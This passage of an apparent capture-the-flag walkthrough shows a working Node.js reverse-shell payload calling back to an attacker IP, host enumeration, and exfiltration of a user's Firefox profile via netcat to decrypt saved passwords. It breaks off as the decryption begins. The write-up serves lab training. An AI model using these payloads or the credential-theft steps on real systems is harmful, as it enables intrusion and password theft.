But it will be easier to spawn a reverse shell directly.
1 2 3 4 5 6 7 8 9 10 11 12
(function(){ var net = require("net"), cp = require("child_process"), sh = cp.spawn("/bin/bash", []); var client = new net.Socket(); client.connect(9999, "10.9.19.77", function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return/a/; // Prevents the Node.js application form crashing })();
Let's one-line it.
1
(function(){ var net = require("net"), cp = require("child_process"), sh = cp.spawn("/bin/bash", []); var client = new net.Socket(); client.connect(9999, "10.9.19.77", function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return/a/; })();
$ ncat -nlvp 9999 Ncat: Version 7.92 ( https://nmap.org/ncat ) Ncat: Listening on :::9999 Ncat: Listening on 0.0.0.0:9999 Ncat: Connection from 10.10.227.181. Ncat: Connection from 10.10.227.181:40986.
id uid=1000(user) gid=1000(user) groups=1000(user),30(dip),46(plugdev)
pwd /var/web
ls -lhA /home/user total 40K lrwxrwxrwx 1 root root 9 Jan 21 2021 .bash_history -> /dev/null -rw-r--r-- 1 user user 3.7K Apr 4 2018 .bashrc drwx------ 2 user user 4.0K Jan 4 2021 .cache drwxrwxrwx 4 user user 4.0K Jan 27 2021 .firefox drwx------ 3 user user 4.0K Jan 4 2021 .gnupg drwxr-xr-x 270 user user 12K Jan 4 2021 .npm drwxrwxr-x 5 user user 4.0K Jan 22 18:43 .pm2 drwx------ 2 user user 4.0K Jan 21 2021 .ssh -rw-rw-r-- 1 user user 22 Jan 4 2021 user.txt
sudo -l is requiring a password and we don't have it. As the hint suggests
that sudo is too heavy maybe this machine is using an alternative.
Here the EoP scenario exploits doas which
is a lightweight alternative to sudo.
1 2 3 4 5
which doas /usr/local/bin/doas
cat /usr/local/etc/doas.conf permit v0id as root
Only v0id can run commands as root with doas, so let's EoP to v0id first.
We saw in the previous step there was a ~/.firefox directory for our current
user.
1 2 3 4 5
ls -lhA /home/user/.firefox total 12K drwxrwxrwx 11 user user 4.0K Jan 27 2021 b5w4643p.default-release drwxrwxrwx 3 user user 4.0K Jan 27 2021 'Crash Reports' -rwxrwxr-x 1 user user 259 Jan 27 2021 profiles.ini
Netcat is available so we can use it to download the directory:
1 2
which nc /bin/nc
On our machine:
1 2
$ mkdir ff-profile && cd ff-profile $ ncat -nlvp 7777 | tar xf -
Execution time: 2022-01-26 22:47:49.922231 Mozilla Profile: ff-profile/b5w4643p.default-release
==================================================================================================== Cookies [SHA256 hash: 20d942903d690f54af3e8aff1e2ca45084d49dbc8940b184e89eacd88c9d8525] ====================================================================================================
Traceback (most recent call last): File "/usr/bin/dumpzilla", line 1145, in <module> All_execute(varDir) File "/usr/bin/dumpzilla", line 204, in All_execute show_cookies_firefox(varDir,varDom = 0) File "/usr/bin/dumpzilla", line 238, in show_cookies_firefox cursor.execute("select baseDomain, name, value, host, path, datetime(expiry, 'unixepoch', 'localtime'), datetime(lastAccessed/1000000,'unixepoch','localtime') as last ,datetime(creationTime/1000000,'unixepoch','localtime') as creat, isSecure, isHttpOnly FROM moz_cookies where baseDomain like ? escape '\\' and name like ? escape '\\' and host like ? escape '\\' and last like ? and creat like ? and isSecure like ? and isHttpOnly like ? and last between ? and ? and c reat between ? and ?",[varDomain,varName,varHost,('%'+varLastacess+'%'),('%'+varCreate+'%'),varSecure,varHttp, varRangeLast1, varRangeLast2, varRangeCreate1,varRangeCreate2]) sqlite3.OperationalError: no such column: baseDomain
But dumpzilla crashs, the last version is from 2013 and doesn't seems to support
newer Firefox profile versions. As we are interested in passwords only, let's
use firefox-decrypt instead.
1 2 3 4 5 6 7 8 9
$ firefox-decrypt ff-profile/ Select the Mozilla profile you wish to decrypt 1 -> hknqkrn7.default 2 -> b5w4643p.default-release 2